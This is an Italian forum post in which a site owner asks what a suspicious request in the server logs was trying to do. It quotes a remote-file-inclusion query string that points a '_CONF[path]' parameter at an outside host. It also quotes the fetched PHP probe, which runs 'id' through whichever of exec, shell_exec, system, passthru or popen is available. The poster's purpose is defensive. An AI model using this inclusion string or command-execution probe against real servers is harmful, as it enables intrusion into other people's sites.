Guardando il log file ho visto che c'era un user agent sospetto (tale libww-perl) e ho quindi deciso di tener traccia delle query string per capire cosa stesse cercando di combinare, questo è un estratto del log:
- Codice: Seleziona tutto
libwww-p|erl
Query string= _CONF[path]=http://www.ccdsm.net/id?
Lo metto nei tag code in modo il link non sia cliccabile, seguendo il link della query string:
- Codice: Seleziona tutto
<?php
echo "549821347819481<br>";
$cmd="id";
$eseguicmd=ex($cmd);
echo $eseguicmd."<br>";
function ex($cfe){
$res = '';
if (!empty($cfe)){
if(function_exists('exec')){
@exec($cfe,$res);
$res = join("\n",$res);
}
elseif(function_exists('shell_exec')){
$res = @shell_exec($cfe);
}
elseif(function_exists('system')){
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists('passthru')){
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(@is_resource($f = @popen($cfe,"r"))){
$res = "";
while(!@feof($f)) { $res .= @fread($f,1024); }
@pclose($f);
}}
return $res;
}
exit;
Qualcuno ha una vaga idea di cosa sta cercando di fare questo script ?
Secondo me nulla di buono e difatti ho una mezza idea di bannare il libwww-perl
Altra domanda, oltre alla query string ci sono altre informazioni che possono essere utili per capire cosa stanno tentando di fare ? (l'IP lo traccio già per eventuali segnalazioni a chi di dovere ma non lo metto)
Ciao